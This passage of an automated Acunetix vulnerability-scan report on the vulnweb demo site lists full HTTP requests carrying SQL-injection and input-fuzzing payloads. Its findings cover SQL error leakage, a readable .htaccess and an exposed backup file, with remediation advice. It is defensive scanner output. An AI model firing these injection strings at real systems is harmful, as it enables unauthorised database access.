NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
update=update&uaddress=SELECT%20*%0d%0a%20FROM%20INFORMATION_SCHEMA.TABLES&ucc=1234-5678
-2300-9000&uemail=ccccc%40gmail.com&uphone=1ACUSTART'"iR0eRACUEND&urname=test
Request headers
/userinfo.php
Details
URL encoded POST input uphone was set to 1ACUSTART'"6XnwLACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 32 SQL query: UPDATE users SET name = 'test', cc = '1234-5678-2300-9000', address = 'SELECT * FROMINFORMATION_SCHEMA.TABLES', email = '[email protected]', phone = '1ACUSTART'"6XnwLACUEND' WHEREuname = 'test' "mysql_query" was called.
80Acunetix Website Audit
POST /userinfo.php HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Content-Length: 161
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
uaddress=SELECT *
FROM
INFORMATION_SCHEMA.TABLES&ucc=1234-5678-2300-9000&[email protected]&uname=1&update=
update&uphone=1ACUSTART'"6XnwLACUEND&urname=test
Request headers
/userinfo.php
Details
URL encoded POST input urname was set to 1ACUSTART'"FubzyACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 32 SQL query: UPDATE users SET name = '1ACUSTART'"FubzyACUEND', cc = '1234-5678-2300-9000', address ='SELECT * FROM INFORMATION_SCHEMA.TABLES', email = '[email protected]', phone = 'test' WHERE uname ='test' "mysql_query" was called.
POST /userinfo.php HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Content-Length: 161
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
uaddress=SELECT *
FROM
INFORMATION_SCHEMA.TABLES&ucc=1234-5678-2300-9000&[email protected]&uname=1&update=
update&uphone=test&urname=1ACUSTART'"FubzyACUEND
Request headers
/userinfo.php
81Acunetix Website Audit
Details
URL encoded POST input urname was set to 1ACUSTART'"jKjkUACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 32 SQL query: UPDATE users SET name = '1ACUSTART'"jKjkUACUEND', cc = '1234-5678-2300-9000', address ='SELECT * FROM INFORMATION_SCHEMA.TABLES', email = '[email protected]', phone = 'test' WHERE uname ='test' "mysql_query" was called.
POST /userinfo.php HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Content-Length: 165
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
update=update&uaddress=SELECT%20*%0d%0a%20FROM%20INFORMATION_SCHEMA.TABLES&ucc=1234-5678
-2300-9000&uemail=ccccc%40gmail.com&uphone=test&urname=1ACUSTART'"jKjkUACUEND
Request headers
82Acunetix Website Audit
.htaccess file readable
MediumSeverity
ValidationType
Scripting (htaccess_File_Readable.script)Reported by module
Description
This directory contains an .htaccess file that is readable. This may indicate a server misconfiguration. htaccess files aredesigned to be parsed by web server and should not be directly accessible. These files could contain sensitiveinformation that could help an attacker to conduct further attacks. It's recommended to restrict access to this file.
Impact
Possible sensitive information disclosure.
Recommendation
Restrict access to the .htaccess file by adjusting the web server configuration.
Affected items
/Mod_Rewrite_Shop
Details
No details are available.
GET /Mod_Rewrite_Shop/.htaccess HTTP/1.1
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
83Acunetix Website Audit
Application error message
MediumSeverity
ValidationType
Scripting (Error_Message.script)Reported by module
Description
This page contains an error/warning message that may disclose sensitive information. The message can also contain thelocation of the file that produced the unhandled exception. This may be a false positive if the error message is found in documentation pages.
Impact
The error messages may disclose sensitive information. This information can be used to launch further attacks.
Recommendation
Review the source code for this script.
References
PHP Runtime Configuration
Affected items
/listproducts.php
Details
URL encoded GET input artist was set to Error message found: You have an error in your SQL syntax
GET /listproducts.php?artist= HTTP/1.1
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/listproducts.php
Details
URL encoded GET input cat was set to Error message found: You have an error in your SQL syntax
GET /listproducts.php?artist=1&cat= HTTP/1.1
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/listproducts.php
84Acunetix Website Audit
Details
URL encoded GET input cat was set to Error message found: You have an error in your SQL syntax
GET /listproducts.php?cat= HTTP/1.1
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/secured/newuser.php
Details
URL encoded POST input uuname was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'#??#Error message found: You have an error in your SQL syntax
POST /secured/newuser.php HTTP/1.1
Content-Length: 225
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email
.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=ahopldfw&
uuname=12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'####
Request headers
/showimage.php
Details
URL encoded GET input file was set to Error message found: Warning: fopen(): Unable to access .tn in /hj/var/www/showimage.php on line 19 Warning: fopen(.tn): failed to open stream: No such file or directory in /hj/var/www/showimage.php on line 19
GET /showimage.php?file=&size=160 HTTP/1.1
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/showimage.php
85Acunetix Website Audit
Details
URL encoded GET input file was set to acu8748%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca8748Error message found: Warning: fopen(): Unable to access acu8748###s1###s2##s3##uca8748 in/hj/var/www/showimage.php on line 7 Warning: fopen(acu8748###s1###s2##s3##uca8748): failed to open stream: No such file or directory in/hj/var/www/showimage.php on line 7
GET /showimage.php?file=acu8748%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca8748 HTTP/1.1
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/userinfo.php
Details
URL encoded POST input uaddress was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'#??#Error message found: You have an error in your SQL syntax
POST /userinfo.php HTTP/1.1
Content-Length: 138
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
update=update&uaddress=12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'####&ucc=1234-5678-2300-900
0&uemail=ccccc%40gmail.com&uphone=test&urname=test
Request headers
/userinfo.php
Details
URL encoded POST input uaddress was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'#??#Error message found: You have an error in your SQL syntax
POST /userinfo.php HTTP/1.1
Content-Length: 144
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
uaddress=12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'####&ucc=1234-5678-2300-9000&uemail=cccc
Request headers
86Acunetix Website Audit
[email protected]&uname=1&update=update&uphone=test&urname=test
/userinfo.php
Details
URL encoded POST input ucc was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'#??#Error message found: You have an error in your SQL syntax
POST /userinfo.php HTTP/1.1
Content-Length: 170
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
update=update&uaddress=SELECT%20*%0d%0a%20FROM%20INFORMATION_SCHEMA.TABLES&ucc=12345'"\'
\");|]*%00{%0d%0a<%00>%bf%27'####&uemail=ccccc%40gmail.com&uphone=test&urname=test
Request headers
/userinfo.php
Details
URL encoded POST input ucc was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'#??#Error message found: You have an error in your SQL syntax
POST /userinfo.php HTTP/1.1
Content-Length: 166
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
uaddress=SELECT *
FROM
INFORMATION_SCHEMA.TABLES&ucc=12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'####&uemail=ccccc@gm
ail.com&uname=1&update=update&uphone=test&urname=test
Request headers
/userinfo.php
Details
URL encoded POST input uemail was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'#??#Error message found: You have an error in your SQL syntax
POST /userinfo.php HTTP/1.1
Content-Length: 170
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Request headers
87Acunetix Website Audit
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
uaddress=SELECT *
FROM
INFORMATION_SCHEMA.TABLES&ucc=1234-5678-2300-9000&uemail=12345'"\'\");|]*%00{%0d%0a<%00>
%bf%27'####&uname=1&update=update&uphone=test&urname=test
/userinfo.php
Details
URL encoded POST input uemail was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'#??#Error message found: You have an error in your SQL syntax
POST /userinfo.php HTTP/1.1
Content-Length: 172
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
update=update&uaddress=SELECT%20*%0d%0a%20FROM%20INFORMATION_SCHEMA.TABLES&ucc=1234-5678
-2300-9000&uemail=12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'####&uphone=test&urname=test
Request headers
/userinfo.php
Details
URL encoded POST input uphone was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'#??#Error message found: You have an error in your SQL syntax
POST /userinfo.php HTTP/1.1
Content-Length: 181
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
uaddress=SELECT *
FROM
INFORMATION_SCHEMA.TABLES&ucc=1234-5678-2300-9000&[email protected]&uname=1&update=
update&uphone=12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'####&urname=test
Request headers
/userinfo.php
Details
URL encoded POST input uphone was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'#??#Error message found: You have an error in your SQL syntax
POST /userinfo.php HTTP/1.1
Content-Length: 185
Request headers
88Acunetix Website Audit
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
update=update&uaddress=SELECT%20*%0d%0a%20FROM%20INFORMATION_SCHEMA.TABLES&ucc=1234-5678
-2300-9000&uemail=ccccc%40gmail.com&uphone=12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'####&ur
name=test
/userinfo.php
Details
URL encoded POST input urname was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'#??#Error message found: You have an error in your SQL syntax
POST /userinfo.php HTTP/1.1
Content-Length: 185
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
update=update&uaddress=SELECT%20*%0d%0a%20FROM%20INFORMATION_SCHEMA.TABLES&ucc=1234-5678
-2300-9000&uemail=ccccc%40gmail.com&uphone=test&urname=12345'"\'\");|]*%00{%0d%0a<%00>%b
f%27'####
Request headers
/userinfo.php
Details
URL encoded POST input urname was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'#??#Error message found: You have an error in your SQL syntax
POST /userinfo.php HTTP/1.1
Content-Length: 181
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
uaddress=SELECT *
FROM
INFORMATION_SCHEMA.TABLES&ucc=1234-5678-2300-9000&[email protected]&uname=1&update=
update&uphone=test&urname=12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'####
Request headers
89Acunetix Website Audit
90Acunetix Website Audit
Backup files
MediumSeverity
ValidationType
Scripting (Backup_File.script)Reported by module
Description
A possible backup file was found on your web-server. These files are usually created by developers to backup their work.
Impact
Backup files can contain script sources, configuration files or other sensitive information that may help an malicious userto prepare more advanced attacks.
Recommendation
Remove the file(s) if they are not required on your website. As an additional step, it is recommended to implement asecurity policy within your organization to disallow creation of backup files in directories accessible from the web.
References
Testing for Old, Backup and Unreferenced Files (OWASP-CM-006)
Security Tips for Server Configuration
Protecting Confidential Documents at Your Site
Affected items
/index.bak
Details
This file was found using the pattern ${fileName}.bak.Original filename: index.phpSource code pattern found: <?PHP require_once("database_connect.php"); ?><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false"--><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --><title>Home of WASP Art</title><!-- InstanceEndEditable --><link rel="stylesheet" href="style.css" type="text/css"><!-- InstanceBeginEditable name="headers_rgn" --><!-- here goes headers headers --><!-- InstanceEndEditable --><script language="JavaScript" type="text/JavaScript"><!--function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();}MM_reloadPage(true);//--></script> </head><body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"><div id="masthead"> <h1 id="siteName">ACUNETIX ART</h1> <h6 id="siteInfo">TEST and Demonstration site for Acunetix Web Vulnerability Scanner</h6> <div id="globalNav">
91Acunetix Website Audit
<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> </div> </div> <!-- end masthead --> <!-- begin content --><!-- InstanceBeginEditable name="content_rgn" --><div id="content"> <h2 id="pageName">welcome to our page</h2> <div class="story"> <h3>Test site for WASP.</h3> </div></div><!-- InstanceEndEditable --><!--end content --> <div id="navBar"> <div id="search"> <form action="search.php" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <?PHP if (isset($_COOKIE["login"]))echo '<li><a href="../logout.php">Logout</a>'; ?></li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p><img src="images/add.jpg" alt="" width="107" height="66"></p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a 